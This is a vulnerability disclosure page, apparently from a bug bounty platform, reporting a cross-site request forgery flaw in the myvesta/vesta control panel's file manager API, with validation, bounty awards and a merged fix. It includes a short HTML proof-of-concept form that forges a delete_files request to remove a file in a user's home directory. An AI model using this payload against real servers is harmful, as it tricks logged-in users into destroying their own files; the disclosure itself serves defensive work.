Cross-Site Request Forgery (CSRF) in myvesta/vesta


Reported on

Aug 24th 2021

✍️ Description

Attacker is able to delete any file on the server if logged in user visits attacker website.

🕵️‍♂️ Proof of Concept

Create a test.txt file under /home/user when you logged in open this POC.html in a browser you can check test.txt deletes.

<script>history.pushState('', '', '/')</script>
<form action="">
<input type="hidden" name="item" value="&#47;home&#47;user&#47;test&#46;txt" />
<input type="hidden" name="dir" value="&#47;home&#47;user" />
<input type="hidden" name="action" value="delete&#95;files" />
<input type="submit" value="Submit request" />

💥 Impact

This vulnerability is capable of forging admin or user to delete any file where user has access to it.

💥 Test

Tested on Edge, firefox, chrome and safari. 📍 Location fm_api.php#L1 📝 References csrf



We have contacted a member of the myvesta/vesta team and are waiting to hear back a year ago
Musio modified the report
a year ago
myvesta validated this vulnerability a year ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
myvesta confirmed that a fix has been merged on 93de22 a year ago
myvesta has been awarded the fix bounty
to join this conversation